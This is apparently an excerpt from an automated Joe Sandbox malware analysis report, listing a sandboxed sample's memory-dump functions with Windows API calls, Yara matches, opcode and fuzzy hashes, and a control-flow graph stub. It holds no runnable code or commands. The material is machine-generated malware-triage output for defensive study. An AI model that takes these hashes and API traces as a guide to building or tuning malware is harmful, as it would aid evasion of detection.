                                                            • Instruction Fuzzy Hash: E731F6B5A00209ABDB14DF98D881EEEBBB9EF8C314F108119F918A7240D774A9118BA5
                                                            APIs
                                                            • NtAllocateVirtualMemory.NTDLL(00501CCB,?,00517F3E,00000000,00000004,00003000,?,?,?,?,?,00517F3E,00501CCB,0051B3B1,00517F3E,56C03309), ref: 00519528
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateMemoryVirtual
                                                            • String ID:
                                                            • API String ID: 2167126740-0
                                                            • Opcode ID: b03ee4917efc09109f1d551df49a914dcd29543988b4e9671e209da27d2be6ba
                                                            • Instruction ID: 8d88cc24edb7a66c76c4e94072cdda48a49992372953c3403c0f2e00f337f89b
                                                            • Opcode Fuzzy Hash: b03ee4917efc09109f1d551df49a914dcd29543988b4e9671e209da27d2be6ba
                                                            • Instruction Fuzzy Hash: AF212BB5A00209AFDB10DF98DC41EEF77B9EF88714F104109FD19A7240E774A9518BA5
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DeleteFile
                                                            • String ID:
                                                            • API String ID: 4033686569-0
                                                            • Opcode ID: 87a012ad8a58bfa591f051fcc329374b3f67c791c4c7b4710c4fbe4803f8a9ba
                                                            • Instruction ID: 0a079ea707a715a7f105175c1355eb17bfb4463cb116c5239a7a068102db7dda
                                                            • Opcode Fuzzy Hash: 87a012ad8a58bfa591f051fcc329374b3f67c791c4c7b4710c4fbe4803f8a9ba
                                                            • Instruction Fuzzy Hash: 4B11A371900209BAE620EBA4CC06FEB77ACEFC9714F104149FA08A7281E775794587A5
                                                            APIs
                                                            • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00519334
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                            • Instruction ID: 758a29886609891560d14e2aeee11a7680426056d5fd5afdc4c05d62e70b464c
                                                            • Opcode Fuzzy Hash: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                            • Instruction Fuzzy Hash: 75E04F32205204BBE610AA59DC01FDB775DDBC5764F014419FA0CA7141D675B91186F5
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: f4ce9715790590b55bce61dbc8248423c98f1b7f3be9225e790684fd30fa9e88
                                                            • Instruction ID: 29b88fdb4d5e7accc51dd4bd0db0e45b1ebc76fc3a43c90abf742b7f2b5152a1
                                                            • Opcode Fuzzy Hash: f4ce9715790590b55bce61dbc8248423c98f1b7f3be9225e790684fd30fa9e88
                                                            • Instruction Fuzzy Hash: 3290023168580013A580B1584885547500597E1301B95D021E0424558C8B148A569361
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 23d599e8276832c21caad28a192ef0cf4341ce556458e26c33ab37dc775f358b
                                                            • Instruction ID: da981791447e882cbd3237083ad9a560dd015de4b7a9e0743c904776c0f3d07b
                                                            • Opcode Fuzzy Hash: 23d599e8276832c21caad28a192ef0cf4341ce556458e26c33ab37dc775f358b
                                                            • Instruction Fuzzy Hash: 22900271681500435580B1584805407700597E23013D5D125A0554564C87188955D269
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 1a21326c0debe85a227f8ec8bae8236f62fa6be96d3b7050fa4057be0d2baf4a
                                                            • Instruction ID: c752737970b4007845c8dbe9528dca01a0d1ccbd44b911b67fdc349574dec21d
                                                            • Opcode Fuzzy Hash: 1a21326c0debe85a227f8ec8bae8236f62fa6be96d3b7050fa4057be0d2baf4a
                                                            • Instruction Fuzzy Hash: CA9002352A1400031585F558060550B144597D73513D5D025F1416594CC72189659321
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 3bf0a9fb1e52458e01fb0a7a88385e754f67ce539ebdd43d482a618d619ebc24
                                                            • Instruction ID: 9dcad566afe8711857a94c976f5d0fd53fbfc7da1448e5629cc0b4e81bc7f545
                                                            • Opcode Fuzzy Hash: 3bf0a9fb1e52458e01fb0a7a88385e754f67ce539ebdd43d482a618d619ebc24
                                                            • Instruction Fuzzy Hash: A29004353D1400031545F55C07055071047C7D73513D5D031F1015554CD731CD71D131
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: f7dc650f459995941f84944ba8c64a0843a47e760b44b13b2920b19d8b76c6a0
                                                            • Instruction ID: 3f656014b2bf1a8d3fbd2df7eaa0699bc9d4c1f805281c9dbf08b330b02dc27d
                                                            • Opcode Fuzzy Hash: f7dc650f459995941f84944ba8c64a0843a47e760b44b13b2920b19d8b76c6a0
                                                            • Instruction Fuzzy Hash: E990023128544843E580B1584405A47101587D1305F95D021A0064698D97258E55F661
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: e9d3c07b704c32d9ad0e4fd561d2bb499bad6588abefabc157da811baab8d489
                                                            • Instruction ID: e56446ee7718add1c2296e98ebdd6be7aba603f7dcea9645de134f1b8dd65c61
                                                            • Opcode Fuzzy Hash: e9d3c07b704c32d9ad0e4fd561d2bb499bad6588abefabc157da811baab8d489
                                                            • Instruction Fuzzy Hash: 0B90023128140803E5C0B158440564B100587D2301FD5D025A0025658DCB158B59B7A1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: a090bcbf051e79391ae71b891a02e68a559b6787507e4476a7162fcf71e7393b
                                                            • Instruction ID: 307dfe35a012506b4bca1294f5ee3a35a9c433af0986a6a8dcb8035e79bc0f2c
                                                            • Opcode Fuzzy Hash: a090bcbf051e79391ae71b891a02e68a559b6787507e4476a7162fcf71e7393b
                                                            • Instruction Fuzzy Hash: 8A90023168540803E590B1584415747100587D1301F95D021A0024658D87558B55B6A1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: afec81a2cd86986f0a3dd8fc96f97c7394d6e3981f53355c80e0cb00235d935f
                                                            • Instruction ID: 2dfd1031a598cf7885b76228005bbd6442696b044a72399fa279b4630a269a68
                                                            • Opcode Fuzzy Hash: afec81a2cd86986f0a3dd8fc96f97c7394d6e3981f53355c80e0cb00235d935f
                                                            • Instruction Fuzzy Hash: FA900271282400035545B1584415617500A87E1201B95D031E1014594DC6258991A125
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 007fc7e699d1db875f5a3f886c05a06bc03585e4cc67c0e8d7c743a4827144a1
                                                            • Instruction ID: bf474a1a20493ed17ca20a4baf6824e36719c6a0953c27d7cdf7f83c25b7e162
                                                            • Opcode Fuzzy Hash: 007fc7e699d1db875f5a3f886c05a06bc03585e4cc67c0e8d7c743a4827144a1
                                                            • Instruction Fuzzy Hash: AD90027128180403E580B5584805607100587D1302F95D021A2064559E8B298D51A135
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: e41b53a0e4598fcc00d95c9092aafe073244fa7a1615c12229cf47c46da59851
                                                            • Instruction ID: bf6304f6226867a43687e0c828aec7b096eecb57a73966dfbb96cccbdf2c4ba4
                                                            • Opcode Fuzzy Hash: e41b53a0e4598fcc00d95c9092aafe073244fa7a1615c12229cf47c46da59851
                                                            • Instruction Fuzzy Hash: C890023168140503E541B1584405617100A87D1241FD5D032A1024559ECB258A92E131
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 72adc2e1a6b94e1cf9eb37d215e46c6660b7825fd292d93b6bfb73709995c3b7
                                                            • Instruction ID: 9a071464ca5eec8523058d935db4ef11a1fd18eff70f3df316a273c1ef32e471
                                                            • Opcode Fuzzy Hash: 72adc2e1a6b94e1cf9eb37d215e46c6660b7825fd292d93b6bfb73709995c3b7
                                                            • Instruction Fuzzy Hash: A8900231291C0043E640B5684C15B07100587D1303F95D125A0154558CCA1589619521
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: c98085fded638c1ee2401e94b82bd93bd5a71ee26b24fc817607a8c2c5d15dcf
                                                            • Instruction ID: 9273265853d65d3bd5416334db5c7832da79a8a7b32aa219321a7fcdb7781556
                                                            • Opcode Fuzzy Hash: c98085fded638c1ee2401e94b82bd93bd5a71ee26b24fc817607a8c2c5d15dcf
                                                            • Instruction Fuzzy Hash: 9B900231681400435580B16888459075005ABE2211795D131A0998554D865989659665
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: ce7b0fdfe78dbaf2c13b896885ed3d602c25a7daa7394ab5ff69f11680fb6fe2
                                                            • Instruction ID: 29aa723355dd44300cfb42196a06c02f314b04b8de818b2f7c7c60b68da849bb
                                                            • Opcode Fuzzy Hash: ce7b0fdfe78dbaf2c13b896885ed3d602c25a7daa7394ab5ff69f11680fb6fe2
                                                            • Instruction Fuzzy Hash: CA9002713C140443E540B1584415B071005C7E2301F95D025E1064558D8719CD52A126
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: df66db05cc5cd99005e2afd77452c95b1dfe84d2e505da563b5022ada411d263
                                                            • Instruction ID: c925a92eff9082da9993ee96f92d4c612b69241834b85d52f994c874f17d85ea
                                                            • Opcode Fuzzy Hash: df66db05cc5cd99005e2afd77452c95b1dfe84d2e505da563b5022ada411d263
                                                            • Instruction Fuzzy Hash: 1390023128140403E540B5985409647100587E1301F95E021A5024559EC7658991A131
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 8e89c7b4e71f4f414100ffe258ba205663eef96fc35bdd34ce24742fe9381e98
                                                            • Instruction ID: 97adb01a4ec771d2423cc14d0d6f4fecf227eb4e564f4bfb4a52f81bdcdee77d
                                                            • Opcode Fuzzy Hash: 8e89c7b4e71f4f414100ffe258ba205663eef96fc35bdd34ce24742fe9381e98
                                                            • Instruction Fuzzy Hash: A090023128140843E540B1584405B47100587E1301F95D026A0124658D8715C951B521
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 4d2e79e81c06b69a2a51e0d6936ff8cfa45b06024b885a8f0a9e8a09e3e2e0e8
                                                            • Instruction ID: 190890252d9fb453ed09203d234ec254574a775ec8b981350853266a027df9d0
                                                            • Opcode Fuzzy Hash: 4d2e79e81c06b69a2a51e0d6936ff8cfa45b06024b885a8f0a9e8a09e3e2e0e8
                                                            • Instruction Fuzzy Hash: 9690023128148803E550B158840574B100587D1301F99D421A442465CD87958991B121
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: c1740f22167501da2ff574a78e504326b7d3a1e16ce0909205a9333e11ab2087
                                                            • Instruction ID: d93497a2c5cdfb1d876623ec509b9756267dac029dc8870a335e9e7b320a6b5e
                                                            • Opcode Fuzzy Hash: c1740f22167501da2ff574a78e504326b7d3a1e16ce0909205a9333e11ab2087
                                                            • Instruction Fuzzy Hash: 4C90023128140413E551B1584505707100987D1241FD5D422A042455CD97568A52E121
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 50eb7ed803c21a606c9f3aa696a61f7bb83b59904245fcaae550a7260af7d7c0
                                                            • Instruction ID: 0d3903d2ef1e7a563f05eeccc84586aa3fba78d423ed093dc3fd52850ee35f71
                                                            • Opcode Fuzzy Hash: 50eb7ed803c21a606c9f3aa696a61f7bb83b59904245fcaae550a7260af7d7c0
                                                            • Instruction Fuzzy Hash: 139002312C2441536985F1584405507500697E12417D5D022A1414954C86269956D621
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: ee38275e7166ab3f60ce413d612bd7a95f9933e86d59fd06ad825730127bcf41
                                                            • Instruction ID: ee07919acbbf028855303ad935355be5469b7d196ee031fe79d5922137053769
                                                            • Opcode Fuzzy Hash: ee38275e7166ab3f60ce413d612bd7a95f9933e86d59fd06ad825730127bcf41
                                                            • Instruction Fuzzy Hash: F690023138140003E580B15854196075005D7E2301F95E021E0414558CDA1589569222
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: c515a385c38e9fa903d1ebc51c8236bfd56df4ad6001d8687972a5a1d440834a
                                                            • Instruction ID: e1a337d597f6d1aa36a5d00f2c1efd068fa937134f53125fc440258f4bcfdfa4
                                                            • Opcode Fuzzy Hash: c515a385c38e9fa903d1ebc51c8236bfd56df4ad6001d8687972a5a1d440834a
                                                            • Instruction Fuzzy Hash: E390023929340003E5C0B158540960B100587D2202FD5E425A001555CCCA1589699321
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 73940f2d8f798249324c96a55f01333e054bc0eb39f8c2842692ff73e2f6258b
                                                            • Instruction ID: ddd0052e55645d464ca28523edb1d2c9a4579bfc3050023752e3e3e231adf380
                                                            • Opcode Fuzzy Hash: 73940f2d8f798249324c96a55f01333e054bc0eb39f8c2842692ff73e2f6258b
                                                            • Instruction Fuzzy Hash: 4490023168550403E540B1584515707200587D1201FA5D421A042456CD87958A51A5A2
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 0b015587a85ab0718299b6ab8fb76f084aa2cb2770f275d20f0d44f896e7c017
                                                            • Instruction ID: 3e4faa8c8ece4ab06fe1215176301085c56cb3d8869e22c58ca324f4b3f1edb0
                                                            • Opcode Fuzzy Hash: 0b015587a85ab0718299b6ab8fb76f084aa2cb2770f275d20f0d44f896e7c017
                                                            • Instruction Fuzzy Hash: 849002312C545103E590B15C44056175005A7E1201F95D031A0814598D86558955A221

                                                            Control-flow Graph

                                                            control_flow_graph 420 500c88-500ca1 421 500ca3-500ca9 420->421 422 500d0a-500d5a call 51bec0 call 504460 call 4f1410 call 511b60 420->422 421->422 425 500c7e-500c80 421->425 433 500d7a-500d80 422->433 434 500d5c-500d6b PostThreadMessageW 422->434 425->420 434->433 435 500d6d-500d77 434->435 435->433
                                                            APIs
                                                            • PostThreadMessageW.USER32(0349A-n,00000111,00000000,00000000), ref: 00500D67
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
